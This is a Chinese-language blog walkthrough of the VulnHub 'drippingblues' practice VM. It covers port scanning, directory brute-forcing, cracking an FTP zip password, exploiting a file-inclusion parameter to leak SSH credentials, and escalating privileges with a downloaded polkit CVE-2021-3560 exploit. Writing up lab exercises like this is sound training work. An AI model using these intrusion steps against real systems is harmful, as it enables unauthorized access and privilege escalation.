当前位置: 首页 > news >正文

vuhub drippingblues靶场攻略

靶场下载:

下载地址:https://download.vulnhub.com/drippingblues/drippingblues.ova

靶场攻略:

主机发现:

使用nmap 192.168.163.1/24扫描一下网段

端口扫描:

nmap -p-65535 -A 192.168.163.151

没有发现有其他端口。

访问80端口:

上面给了两个用户名。

页面扫描:

没有其他信息,尝试扫描一下其他页面

dirsearch -u http://192.168.163.151/

扫到了robots.txt

上面写了两个文件,挨个访问一下,

/etc/dripispowerful.html   403

/dripisreal.txt:

上面说让上面到一个网站找第n个歌词。

结果我也没弄懂他说的是哪个。

访问21端口:

他既然开21端口了,那么我们就试着访问一下

ftp://192.168.163.151

发现有一个压缩包,要解压时发现需要密码:

使用命令

fcrackzip -D -p /home/kali/rockyou.txt -u respectmydrip.zip

解压后找到了respectmydrip.txt文件

让我们专注drip

后来在网上查了其他攻略,发现首页有文件包含漏洞。参数是drip

我们包含/etc/dripispowerful.html 文件

右键查看源代码:

找到密码了。

上面用户名有两个,两组账号密码,是ssh的,那么挨个试一下,thugger/imdrippinbiatch成功登录。

sudo -l

find / -perm -u=s 2>/dev/null,查看里面的应用

发现有一个polkit

使用工具搜索一下polkit有什么漏洞:

searchsploit polkit

发现可以上传个脚本:

wget https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

但是这么上传时用不了的,我也不知道为什么,于是我使用账号密码进入虚拟机,把脚本拖到桌面上运行

http://www.dtcms.com/a/324980.html

相关文章:

  • Windows环境下私有化部署Dify,并接入通义千问模型
  • UNet改进(31):基于Adaptive Attention的UNet设计与实践
  • 基于Spring SSE构建实时监控系统
  • Python 的列表 list 和元组 tuple 有啥本质区别?啥时候用谁更合适?
  • TC39x STM(System Timer)学习记录
  • 压力测试等工具源码包编译及使用方法
  • Vulnhub doubletrouble 靶场复现 详细攻略
  • Knuth‘s TwoSum Algorithm 原理详解
  • MyBatis 核心入门:从概念到实战,一篇掌握简单增删改查
  • 【东枫科技】FR3 可扩展测试平台,适用于 6G 研究与卫星通信,高达 1.6 GHz 的带宽
  • 【自动化运维神器Ansible】playbook案例解析:Tags组件实现任务选择性执行
  • 【01】华勤技术股份有限公司——华勤C++笔试,题目记录及解析
  • Java基础-使用反射做一个简易框架
  • Python 实例属性和类属性
  • 【PyTorch】单目标检测项目
  • vulnhub-Drippingblues靶机
  • Typora结合PicGo + 使用Gitee搭建个人免费图床
  • 计算机网络---IP(互联网协议)
  • 2025年6月电子学会全国青少年软件编程等级考试(Python六级)真题及答案
  • 二叉树进阶 之 【二叉搜索树的简介与模拟实现的前提准备】
  • 【杂谈】-智能代理+可观察性:构建下一代复杂系统监控体系
  • UE5多人MOBA+GAS 41、制作一个飞弹,添加准心索敌
  • JS实现数组扁平化
  • 计算二分类误差时的常见错误及解决方案
  • ubuntu22.04+samba
  • VMware 使用 Ubuntu 一段时间后逐渐卡顿、甚至卡死的问题
  • sqli-labs-master/Less-51~Less-61
  • 解读 GPT-5:从“博士级 AI 专家”能力到 OpenAI API Key 获取与实践(提示工程→性能调优全流程)
  • MySQL自增ID与UUID的区别及其在索引分裂中的表现与优化
  • W3D引擎游戏开发----从入门到精通【23】